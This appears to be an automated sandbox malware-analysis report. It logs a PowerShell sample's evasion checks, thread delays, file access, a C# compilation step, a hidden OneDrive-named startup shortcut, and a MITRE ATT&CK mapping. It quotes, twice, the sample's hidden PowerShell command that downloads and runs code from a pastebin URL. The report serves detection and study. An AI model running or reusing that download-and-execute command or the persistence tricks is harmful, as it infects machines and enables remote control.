Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4232Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5600Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 832Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4429Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5333Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 847
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 664
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4064
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5668
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep time: -15679732462653109s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1016Thread sleep count: 832 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 772Thread sleep count: 134 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2624Thread sleep count: 132 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7400Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4476Thread sleep count: 4429 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5972Thread sleep count: 5333 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164Thread sleep time: -22136092888451448s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6492Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6432Thread sleep count: 847 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6252Thread sleep count: 664 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6292Thread sleep count: 181 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6224Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 616Thread sleep count: 4064 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1912Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1080Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 616Thread sleep count: 5668 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: powershell.exe, 0000000F.00000002.2094788479.000001CA46053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
Source: powershell.exe, 00000000.00000002.1787154201.000001AC214ED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1984111862.0000012D9C0B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.cmdline"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES226F.tmp" "c:\Users\user\AppData\Local\Temp\r422pnl3\CSC544D18D68EB4FCE8319BF18EEFBBF9E.TMP"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts111
Windows Management Instrumentation		11
Registry Run Keys / Startup Folder		11
Process Injection		1
Masquerading		OS Credential Dumping111
Security Software Discovery		Remote Services1
Archive Collected Data		1
